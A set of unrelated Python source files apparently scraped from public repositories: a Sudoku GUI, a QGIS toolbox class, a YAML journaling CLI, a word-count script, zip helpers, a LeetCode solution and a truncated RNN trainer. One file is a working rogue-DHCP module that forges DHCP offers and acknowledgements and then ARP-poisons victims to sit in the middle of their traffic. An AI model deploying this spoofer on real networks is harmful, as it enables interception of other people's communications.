self.label_2_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_4.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_3.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_5.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_3_8.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_5_6.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_4_7.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_7_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_8_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_6_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_0_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_1_2.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_0.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.label_2_1.setStatusTip(_translate("MainWindow", "Scroll here to change the number. Only valid numbers can be set.", None))
self.btnSave.setStatusTip(_translate("MainWindow", "Save current state of the numbers in the grid. You can revert back to the saved state using the \"Load Grid State\" button (Ctrl + S)", None))
self.btnSave.setText(_translate("MainWindow", "Save", None))
self.btnRevert.setStatusTip(_translate("MainWindow", "Load a previously saved state into the grid (Ctrl + R)", None))
self.btnRevert.setText(_translate("MainWindow", "Revert", None))
self.btnSolve.setStatusTip(_translate("MainWindow", "Solve the Sudoku Puzzle (Ctrl + l)", None))
self.btnSolve.setText(_translate("MainWindow", "Solve", None))
self.btnClear.setStatusTip(_translate("MainWindow", "Clear all the cells in the grid so that you can start a fresh puzzle (Ctrl + C)", None))
self.btnClear.setText(_translate("MainWindow", "Clear", None))
self.label.setText(_translate("MainWindow", "Solution Box -", None))
self.menuFile.setTitle(_translate("MainWindow", "&File", None))
self.menuView.setTitle(_translate("MainWindow", "&View", None))
self.menuHelp.setTitle(_translate("MainWindow", "&Help", None))
self.menuSolution.setTitle(_translate("MainWindow", "&Solution", None))
self.actionExit.setText(_translate("MainWindow", "E&xit", None))
self.actionExit.setStatusTip(_translate("MainWindow", "Close this app", None))
self.actionExit.setShortcut(_translate("MainWindow", "Ctrl+W", None))
self.actionFullscreen.setText(_translate("MainWindow", "&Fullscreen", None))
self.actionFullscreen.setStatusTip(_translate("MainWindow", "Toggle fullscreen view", None))
self.actionFullscreen.setShortcut(_translate("MainWindow", "F11", None))
self.actionHowToUse.setText(_translate("MainWindow", "How To Use?", None))
self.actionHowToUse.setStatusTip(_translate("MainWindow", "Show instructions on how to use this app", None))
self.actionHowToUse.setShortcut(_translate("MainWindow", "F1", None))
self.actionAbout.setText(_translate("MainWindow", "&About", None))
self.actionAbout.setStatusTip(_translate("MainWindow", "Show the About dialog", None))
self.actionShowSolution.setText(_translate("MainWindow", "Show solution", None))
self.actionShowSolution.setStatusTip(_translate("MainWindow", "Togge solution mode. Turning off solution makes solving slightly faster.", None))
from sudokugrid import SudokuGrid
from sudokucell import SudokuCell
| guanidene/pySudokuSolver | ui_sudoku_solver.py | Python | bsd-3-clause | 121,430 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
ToolboxAction.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4 import QtGui
class ToolboxAction(object):
    """Base class for actions shown in the Processing toolbox.

    Subclasses are expected to override :meth:`getIcon` and add their own
    ``execute``-style behavior; this base only stores a toolbox reference.
    """

    def __init__(self):
        # True if the action should be shown even if there are no
        # algorithms in the provider (for instance, when it is deactivated).
        self.showAlways = False

    def setData(self, toolbox):
        """Remember the toolbox this action is attached to."""
        self.toolbox = toolbox

    def getIcon(self):
        """Return the default algorithm icon (os.path.join instead of
        hand-built '/'-concatenation, so the path is portable)."""
        return QtGui.QIcon(os.path.join(os.path.dirname(__file__),
                                        '..', 'images', 'alg.png'))
| mhugent/Quantum-GIS | python/plugins/processing/gui/ToolboxAction.py | Python | gpl-2.0 | 1,554 |
import util
from threading import Thread
from poison import Poison
from arp import arp
from zoption import Zoption
from scapy.all import *
class dhcp(Poison):
def __init__(self):
super(dhcp, self).__init__('DHCP Spoof')
conf.verb = 0
self.local_mac = get_if_hwaddr(conf.iface)
self.spoofed_hosts = {}
self.curr_ip = None
self.config.update({"gateway":Zoption(type = "ip",
value = None,
required = True,
display = "Spoofed gateway address"),
"net_mask":Zoption(type = "ipmask",
value = None,
required = True,
display = "Netmask to distribute IPs from"),
})
self.info = """
Set up a rogue DHCP server and hand out IP addresses.
Once an IP has been dispensed, an ARP poisoning session
will be initiated for the host. If the rogue DHCP is
shutdown with hosts, the ARP poisoning session will be
destroyed, but the victim IP addresses we handed out
will be the same. This will allow the attacker an ability
to configure an ARP poisoning session in the future if they
so choose.
ARP poisons will not appear under sessions, but will
instead be managed by the spoofed_hosts dictionary.
Configure sniffers for traffic.
"""
def initialize(self):
util.Msg("Configuring rogue DHCP server...")
self.running = True
thread = Thread(target=self.netsniff)
thread.start()
return True
def netsniff(self):
""" Packet sniffer """
sniff(prn=self.pkt_handler, store=0,
stopper=self.test_stop, stopperTimeout=3)
def pkt_handler(self, pkt):
""" Handle traffic; wait for DHCPREQ or DHCPDISC; there are two cases. Most systems, if they've
previously connected to the network, will skip the discovery stage and make a DHCP REQUEST.
We can respond with a DHCPACK and hopefully get it; if we don't, we can still ARPP the host.
New systems with DHCPDISCOVER first; in this case, we can quite easily gain control, give it
our own address, and ARPP it.
"""
gateway = self.config['gateway'].value
# is this a DHCP packet!?
if self.running and DHCP in pkt:
for opt in pkt[DHCP].options:
# if the option is a REQUEST
if type(opt) is tuple and opt[1] == 3:
fam, hw = get_if_raw_hwaddr(conf.iface)
# get the requested address
requested_addr = None
for item in pkt[DHCP].options:
if item[0] == 'requested_addr':
requested_addr = item[1]
# if the IP address is the one we've reserved for it,
# we're golden. Otherwise we need to check if the one
# they're requesting is free
if self.curr_ip != requested_addr:
if not requested_addr in self.spoofed_hosts:
# ip is free, set and use it
self.curr_ip = requested_addr
else:
# ip is in use; generate another
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
lease = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
lease /= IP(src=gateway, dst='255.255.255.255')
lease /= UDP(sport=67, dport=68)
lease /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
lease /= DHCP(options=[('message-type', 'ack'),
('server_id', gateway),
('lease_time', 86400),
('subnet_mask', '255.255.255.0'),
('router', gateway),
('name_server', gateway),
'end'])
sendp(lease, loop=False)
util.Msg('Handed \'%s\' out to \'%s\''
% (self.curr_ip, pkt[Ether].src))
util.debug('Initializing ARP spoofing...')
tmp = arp()
victim = (self.curr_ip, getmacbyip(self.curr_ip))
target = (gateway, hw)
tmp.victim = victim
tmp.target = target
if not tmp.initialize_post_spoof() is None:
self.spoofed_hosts[self.curr_ip] = tmp
util.debug('ARP spoofing successfully configured '
'for \'%s\'' % self.curr_ip)
else:
util.Msg('ARP session unsuccessful for %s! You may not'
'be able to get in the middle of them!' % self.curr_ip)
# discover; send offer
elif type(opt) is tuple and opt[1] == 1:
fam, hw = get_if_raw_hwaddr(conf.iface)
if self.curr_ip is None:
self.curr_ip = self.config['net_mask'].value \
.split('/')[0]
else:
self.curr_ip = util.next_ip(self.curr_ip)
# build and send the DHCP Offer
offer = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw)
offer /= IP(src=gateway, dst='255.255.255.255')
offer /= UDP(sport=67, dport=68)
offer /= BOOTP(op=2, chaddr=mac2str(pkt[Ether].src),
yiaddr=self.curr_ip, xid=pkt[BOOTP].xid)
offer /= DHCP(options=[('message-type', 'offer'),
('subnet_mask', '255.255.255.0'),
('lease_time', 86400),
('name_server', gateway),
('router', gateway),
'end'])
sendp(offer, loop=False)
util.Msg('Sent DHCP offer for \'%s\' to \'%s\''
% (self.curr_ip, pkt[Ether].src))
def view(self):
""" Overriden view for dumping gateway/hosts
before going into dump data mode
"""
print '\033[33m[!] Spoofed gateway: \033[32m%s\033[0m' % \
self.config['gateway'].value
print '\033[33m[!] Currently Spoofing:\033[0m'
for key in self.spoofed_hosts:
print '\t\033[32m[+] %s\033[0m' % str(self.spoofed_hosts[key].victim)
try:
self.dump_data = True
raw_input()
self.dump_data = False
except KeyboardInterrupt:
self.dump_data = False
return
def shutdown(self):
""" Shutdown DHCP server and any ARP poisons
"""
self.running = False
# shutdown arp poisons if we have any running
if len(self.spoofed_hosts.keys()) > 0:
for key in self.spoofed_hosts:
self.spoofed_hosts[key].shutdown()
util.Msg('DHCP server shutdown.')
| bacemtayeb/Tierra | src/modules/poison/dhcp.py | Python | gpl-3.0 | 8,157 |
#!/usr/bin/env python
# cmy:- c-mee
# DUMP your thoughts and CLEAR your mind using c-mee.
# Version : v1-beta
# email:- cmy.project.mail@gmail.com
# cmy is short form of Clear Mind YAML
import yaml
import datetime
import os
import sys
import io
from pathlib import Path
# Create the yaml file, if it does not exist.
# Create the yaml file, if it does not exist.
def create_yaml_file(cmy_dir, now):
    """Ensure the log directory and this month's YAML file exist.

    A brand-new file is seeded with today's empty 'LOG0' skeleton.
    Uses write_yaml_file() instead of duplicating the open/write logic.
    """
    if not os.path.exists(cmy_dir):
        os.makedirs(cmy_dir)
    yaml_file = yaml_fp_creator(cmy_dir, now)
    if not os.path.exists(yaml_file):
        write_yaml_file(yaml_file, yaml_printer(first_log_entry(now)))
# Common function for writing the final data to YAML file.
# Common function for writing the final data to YAML file.
def write_yaml_file(yaml_file, yaml_data_final):
    """Overwrite *yaml_file* with the already-serialized YAML text."""
    with open(yaml_file, 'w') as out_fd:
        out_fd.write(yaml_data_final)
# Common function for creating full path to current YAML file
# Common function for creating full path to current YAML file
def yaml_fp_creator(cmy_dir, now):
    """Return the month's log-file path: <cmy_dir>/<MONTH>_<YEAR>.yaml."""
    return "%s/%s_%s.yaml" % (cmy_dir, now[2], now[3])
# Generate time and date fileds.
# Generate time and date fields for the current moment.
def ttmy():
    """Return a 4-tuple of strings: (HHMM, DD_MON_DAY, MON, YYYY).

    Example: ("1315", "24_JUN_FRI", "JUN", "2016").
    """
    moment = datetime.datetime.now()
    month = moment.strftime("%b").upper()
    today = "_".join([moment.strftime("%d"), month,
                      moment.strftime("%a").upper()])
    return moment.strftime("%H%M"), today, month, moment.strftime("%G")
# Common function for reading the contents in YAML.
# Common function for reading the contents in YAML.
def read_yaml_file(yaml_file):
    """Load *yaml_file* and return its mapping ({} when the file is empty).

    Fixes vs. the original: the file descriptor is now closed (it leaked),
    yaml.safe_load replaces yaml.load (no arbitrary-object construction),
    and the error message names the file that actually failed instead of
    always blaming cmy.conf.
    """
    try:
        with open(yaml_file, 'r') as yaml_fd:
            yaml_raw_data = yaml.safe_load(yaml_fd) or {}
    except IOError:
        print("Error opening %s." % yaml_file)
        sys.exit()
    return yaml_raw_data
# list command function
# list command function
def list_cmd(args, cmy_dir, now):
    """Return the YAML dump of the month's log, or only today's section.

    With "today" as the third CLI argument, prints today's date header and
    returns just that day's entries.
    """
    yaml_raw_data = read_yaml_file(yaml_fp_creator(cmy_dir, now))
    if len(args) > 2:
        if args[2] == "today":
            todays_dump = yaml_printer(yaml_raw_data[now[1]])
            print(now[1] + ":")
            return todays_dump
        # NOTE(review): any other third argument falls through and the
        # caller prints None -- preserved from the original behavior.
        return None
    return yaml_printer(yaml_raw_data)
# convert YAML data in dict to YAML writable format.
# convert YAML data in dict to YAML writable format.
def yaml_printer(yaml_data_dict):
    """Serialize *yaml_data_dict* to block-style YAML text."""
    return yaml.dump(yaml_data_dict, default_flow_style=False)
# The first entry in any YAML file.
# The first entry in any YAML file.
def first_log_entry(now):
    """Return the skeleton for a fresh day: {<today>: {'LOG0': {}}}."""
    today = now[1]
    return {today: {'LOG0': {}}}
# Common function to append YAML dict.
# Common function to append a new entry to the YAML dict.
def x_log_entry(args, now, yaml_data_dict):
    """Append one LOG<n> record under today's key and return the dict.

    Shape: {<today>: {<LOGn>: {'TIME': int, 'TYPE': str, 'ENTRY': str}}}.
    The input dict is mutated in place and also returned.
    """
    new_record = {
        'TIME': int(now[0]),
        'TYPE': args[1],
        'ENTRY': str(' '.join(args[2:])),
    }
    yaml_data_dict[str(now[1])][log_id_creator(yaml_data_dict, now)] = new_record
    return yaml_data_dict
# Get the dictonary to modify
# Get the per-day dictionary to modify.
def log_dict_to_modify(yaml_raw_data, date_key):
    """Return the sub-dict of log entries stored under *date_key*."""
    return yaml_raw_data[date_key]
# info and todo cmds function
# info and todo cmds function
def info_todo_cmds(args, cmy_dir, now):
    """Append an info/todo entry to this month's log file and confirm."""
    yaml_file = yaml_fp_creator(cmy_dir, now)
    updated = x_log_entry(args, now, read_yaml_file(yaml_file))
    write_yaml_file(yaml_file, yaml_printer(updated))
    print("Saved.\nContinue your work buddy !!")
# Genereate LOG* to append.
# Generate the next LOG* key to append.
def log_id_creator(yaml_raw_data, now):
    """Return the next unused 'LOG<n>' key for today's entries.

    BUGFIX: the original took sorted(keys)[-1], a *lexicographic* maximum.
    Once ten entries exist, 'LOG9' sorts after 'LOG10', so 'LOG10' would be
    generated a second time and the earlier entry silently overwritten.
    Compare the numeric suffixes instead.
    """
    today = now[1]
    highest = max(int(log_id.replace('LOG', ''))
                  for log_id in yaml_raw_data[today])
    return 'LOG' + str(highest + 1)
# Create "today" key & LOG0, if it is not present in the file.
# Create "today" key & LOG0, if it is not present in the file.
def check_for_today_key(cmy_dir, now):
    """Ensure this month's file has a section for today; create one if not.

    Uses the 'in' operator instead of dict.has_key(), which was removed in
    Python 3.
    """
    yaml_file = yaml_fp_creator(cmy_dir, now)
    yaml_raw_data = read_yaml_file(yaml_file)
    today = now[1]
    if today not in yaml_raw_data:
        yaml_raw_data[today] = first_log_entry(now)[today]
        write_yaml_file(yaml_file, yaml_printer(yaml_raw_data))
def read_conf():
    """Read ~/.config/cmy/cmy.conf and return the expanded log directory.

    Exits with a message when the config is empty or cmy_dir is missing or
    blank.  BUGFIX: the original indexed cmy_conf['cmy_dir'] before its
    guard, so a missing key raised KeyError and the dead
    '"cmy_dir" not in locals()' check could never fire.
    """
    cmy_conf = read_yaml_file(os.path.expanduser('~') + "/.config/cmy/cmy.conf")
    # check empty dictionary
    if not cmy_conf:
        print("cmy.conf is empty.")
        sys.exit()
    # Look the key up on the dict itself so a missing/blank value is reported
    # instead of crashing.
    cmy_dir = os.path.expanduser(cmy_conf.get('cmy_dir') or "")
    if cmy_dir == "":
        print("cmy_dir is empty or not defined. set a location for your logs.")
        sys.exit()
    return cmy_dir
def check_conf_file():
    """Ensure ~/.config/cmy/cmy.conf exists, creating a default if needed.

    Returns True when the config file exists or was created successfully,
    False when a directory occupies the cmy.conf path.  Dead commented-out
    open() calls from the original were removed.
    """
    confdirpath = os.path.expanduser("~/.config/cmy/")
    conffilepath = confdirpath + "cmy.conf"
    conf_path = Path(conffilepath)
    if conf_path.is_file():
        # Config already present.
        return True
    if conf_path.is_dir():
        # A directory with the same name blocks config creation.
        return False
    # cmy.conf doesn't exist: create the directory and a default config.
    if not os.path.exists(confdirpath):
        os.makedirs(confdirpath)
    confdata = ("# Configuration file for cmy.py\n"
                "# The logs are saved in ~/cmy_logs directory by default.\n"
                "cmy_dir: ~/cmy_logs/\n")
    with open(conffilepath, "w") as f:
        f.write(confdata)
    return True
def starting_up():
    """Bootstrap the CLI: verify config, load settings, prepare today's log.

    Returns (argv, now-tuple, log directory).
    """
    if not check_conf_file():
        print("Config file doesn't exist. Problem creating the new config file.")
        sys.exit()
    cmy_dir = read_conf()
    now = ttmy()
    create_yaml_file(cmy_dir, now)
    check_for_today_key(cmy_dir, now)
    return sys.argv, now, cmy_dir
def start_here():
    """Dispatch the sub-command named on the command line."""
    args, now, cmy_dir = starting_up()
    if len(args) == 1:
        # BUGFIX: the usage text advertised a nonexistent "show" command;
        # the implemented command is "list".
        print("Usage: cmy.py <options>\nSupported Options: list|info|todo")
    elif args[1] == "list":
        print(list_cmd(args, cmy_dir, now))
    elif args[1] in ("info", "todo"):
        # info and todo share the same handler.
        info_todo_cmds(args, cmy_dir, now)
    else:
        print("Invalid Option")
# Entry point guard: run the CLI only when executed as a script,
# not when imported as a module.
if __name__ == '__main__':
    start_here()
| anilv4/cmy | cmy/cmy.py | Python | gpl-3.0 | 6,870 |
"""
returns tsv of word frequencies in revision comments
Usage:
revision_comment_word_extractor (-h|--help)
revision_comment_word_extractor <input> <output>
[--debug]
[--verbose]
Options:
-h, --help This help message is printed
<input> Path to file to process.
<output> Where revisions results
will be written
--debug Print debug logging to stderr
--verbose Print dots and stuff to stderr
"""
import docopt
import sys
import logging
import operator
from collections import defaultdict
import re
import mysqltsv
# Matches a leading "/* section title */" marker that MediaWiki prepends to
# section-edit revision comments, so it can be stripped before word counting.
REMOVED_COMMENT_RE = re.compile(r'^\/\*.*.\*\/')
# Punctuation characters removed when normalizing words.
PUNCTUATION_RE = re.compile(r'\:|\(|\)|\.|\,|\-')

logger = logging.getLogger(__name__)
def main(argv=None):
    """Parse CLI arguments and run the word extractor.

    BUGFIX: *argv* was accepted but ignored; it is now forwarded to docopt
    (None still means "use sys.argv[1:]"), so the function can be driven
    programmatically.
    """
    args = docopt.docopt(__doc__, argv=argv)
    logging.basicConfig(
        level=logging.INFO if not args['--debug'] else logging.DEBUG,
        format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
    )
    input_file = mysqltsv.Reader(open(args['<input>'], "r"), headers=False,
                                 types=[str, int, str, str, int])
    output_file = mysqltsv.Writer(open(args['<output>'], "w"))
    verbose = args['--verbose']

    run(input_file, output_file, verbose)
def run(input_file, output_file, verbose):
    """Count normalized words across all revision comments.

    :param input_file: iterable of rows; column index 3 holds the comment
        text (may be None).
    :param output_file: writer with a ``write([word, count])`` method;
        rows are emitted most-frequent-first.
    :param verbose: when truthy, progress is reported on stderr.
    """
    word_count = defaultdict(int)

    for i, line in enumerate(input_file):
        comment = line[3]
        if comment is not None:  # was `!= None`; identity test is the idiom
            # Strip a leading "/* section title */" marker before tokenizing.
            comment = re.sub(REMOVED_COMMENT_RE, "", comment)
            for word in comment.split(" "):
                normalized_word = re.sub(PUNCTUATION_RE, "", word).lower()
                word_count[normalized_word] += 1
        if verbose and i % 10000 == 0 and i != 0:
            sys.stderr.write("Revisions processed: {0}\n".format(i))
            sys.stderr.flush()

    # Most frequent words first.
    sorted_word_count = sorted(word_count.items(), key=operator.itemgetter(1),
                               reverse=True)
    sum_of_word_counts = 0
    for i, entry in enumerate(sorted_word_count):
        output_file.write([entry[0], entry[1]])
        sum_of_word_counts += entry[1]
        if verbose and i % 10000 == 0 and i != 0:
            sys.stderr.write("Words written: {0}\n".format(i))
            sys.stderr.flush()

    print("Total word count: {0}".format(sum_of_word_counts))

    if verbose:
        sys.stderr.write("Completed writing out result file\n")
        sys.stderr.flush()
# Run only when executed as a script; importing this module for its run()
# function must not trigger a full extraction.
if __name__ == "__main__":
    main()
| hall1467/wikidata_usage_tracking | python_analysis_scripts/revision_comment_word_extractor.py | Python | mit | 2,427 |
# -*- coding: utf-8 -*-
"""
A file compress utility module. You can easily programmatically add files
and directorys to zip archives. And compress arbitrary binary content.
- :func:`zip_a_folder`: add folder to archive.
- :func:`zip_everything_in_a_folder`: add everything in a folder to archive.
- :func:`zip_many_files`: Add many files to a zip archive.
- :func:`write_gzip`: Write binary content to gzip file.
- :func:`read_gzip`: Read binary content from gzip file.
**中文文档**
提供了若干个文件和数据压缩的快捷函数。
- :func:`zip_a_folder`: 将目录添加到压缩包。
- :func:`zip_everything_in_a_folder`: 将目录内的所有文件添加到压缩包。
- :func:`zip_many_files`: 将多个文件添加到压缩包。
- :func:`write_gzip`: 将二进制数据写入文件, 例如python pickle, bytes string。
- :func:`read_gzip`: 读取解压后的二进制数据内容。
注: python中zipfile包自带的ZipFile方法的用法如下:
基本用法::
with ZipFile("filename.zip", "w") as f:
f.write(path)
其中path是文件路径。 如果path是文件夹, 并不会将文件夹内所有的文件添加到压缩包中。
相对路径压缩:
比如你有一个路径 ``C:\download\readme.txt``, 如果当前路径是 ``C:\``,
而此时你将 ``readme.txt`` 添加到压缩包时则是在压缩包内添加一个: ``download\readme.txt``,
如果当前路径是 ``C:\download\``, 则在压缩包内添加的路径则是: ``readme.txt``
"""
from __future__ import print_function
import os
from zipfile import ZipFile
def zip_a_folder(src, dst):
    """Add a folder and everything inside it to a zip archive.

    The root folder itself is included, i.e. archive entries are prefixed
    with the folder's own name::

        zip_a_folder("paper", "paper.zip")

        paper.zip
            |---paper
                |--- algorithm.pdf
                |--- images
                    |--- 1.jpg

    If ``dst`` already exists, a message is printed and nothing is done.
    """
    if os.path.exists(dst):
        print("destination '%s' already exist." % dst)
        return

    src, dst = os.path.abspath(src), os.path.abspath(dst)
    basename = os.path.basename(src)

    # Pass explicit arcnames instead of chdir()-ing around the tree: the
    # previous implementation changed the process-wide cwd and never
    # restored it when ZipFile.write() raised mid-archive.
    with ZipFile(dst, "w") as f:
        for dirname, _, fnamelist in os.walk(src):
            for fname in fnamelist:
                abspath = os.path.join(dirname, fname)
                arcname = os.path.join(basename, os.path.relpath(abspath, src))
                f.write(abspath, arcname)
def zip_everything_in_a_folder(src, dst):
    """Add everything inside a folder (but not the folder itself) to a zip.

    ::

        zip_everything_in_a_folder("paper", "paper.zip")

        paper.zip
            |--- algorithm.pdf
            |--- images
                |--- 1.jpg

    If ``dst`` already exists, a message is printed and nothing is done.
    """
    if os.path.exists(dst):
        print("destination '%s' already exist." % dst)
        return

    src, dst = os.path.abspath(src), os.path.abspath(dst)

    # Arcnames are paths relative to ``src``.  Using explicit arcnames
    # avoids mutating the process cwd (the previous chdir() was never
    # restored if an exception occurred while writing the archive).
    with ZipFile(dst, "w") as f:
        for dirname, _, fnamelist in os.walk(src):
            for fname in fnamelist:
                abspath = os.path.join(dirname, fname)
                f.write(abspath, os.path.relpath(abspath, src))
def zip_many_files(list_of_abspath, dst):
    """Add many files to a zip archive, flattened to their basenames.

    Duplicate basenames are all kept in the archive (as duplicate entries).
    If ``dst`` already exists, a message is printed and nothing is done.
    """
    if os.path.exists(dst):
        print("destination '%s' already exist." % dst)
        return

    # Write each file under its basename directly.  This removes the
    # chdir()-per-file dance, which was not exception-safe and crashed on
    # bare filenames (os.chdir("") raises).
    with ZipFile(dst, "w") as f:
        for abspath in list_of_abspath:
            f.write(abspath, os.path.basename(abspath))
| MacHu-GWU/single_file_module-project | sfm/winzip.py | Python | mit | 4,194 |
class Solution:
    def twoCitySchedCost(self, costs):
        """Minimum total cost flying exactly half the people to each city.

        Sort by the saving of choosing city A over city B; the half that is
        relatively cheaper for A goes to A, the remainder goes to B.
        """
        ordered = sorted(costs, key=lambda pair: pair[0] - pair[1])
        half = len(ordered) // 2
        return (sum(pair[0] for pair in ordered[:half]) +
                sum(pair[1] for pair in ordered[half:]))
# Ad-hoc smoke check; guarded so importing this module stays silent.
if __name__ == '__main__':
    print(Solution().twoCitySchedCost([[10, 20], [30, 200], [400, 50], [30, 20]]))
| zuun77/givemegoogletshirts | leetcode/python/1029_two-city-scheduling.py | Python | apache-2.0 | 374 |
#!/usr/bin/env python3
from rnnlm_ops import RnnlmOp, run_epoch
from dataset import Datasets
from config import Config
import os
import tensorflow as tf
class Train(RnnlmOp):
  """Training operation for the RNN language model.

  Builds three weight-sharing model instances (train/valid/test) and runs
  the epoch loop, checkpointing via ``self.io``.
  """
  def __init__(self, config, params):
    # params.data_path: dataset directory (must exist)
    # params.continue_training: resume from config's stored epoch/step
    # params.loss_fct: loss used by the training model only
    super(Train, self).__init__(config, params)
    self.io.check_dir(params.data_path)
    # Enforce a strict bool (rejects truthy non-bool values like 1.5).
    assert(bool(params.continue_training) == params.continue_training)
    self.data_path = params.data_path
    self.continue_training = params.continue_training
    self.loss_fct = params.loss_fct
    if not self.continue_training:
      # Fresh run: reset the epoch/step counters persisted in the config.
      self.config.epoch, self.config.step = 1,0
    self._load_data()
    self.build_graph()
  def _load_data(self):
    """Load the datasets and persist the vocabulary mapping via self.io."""
    self.data = Datasets(self.data_path,
                training=True,
                word_to_id=None,
                batch_size=self.config.batch_size,
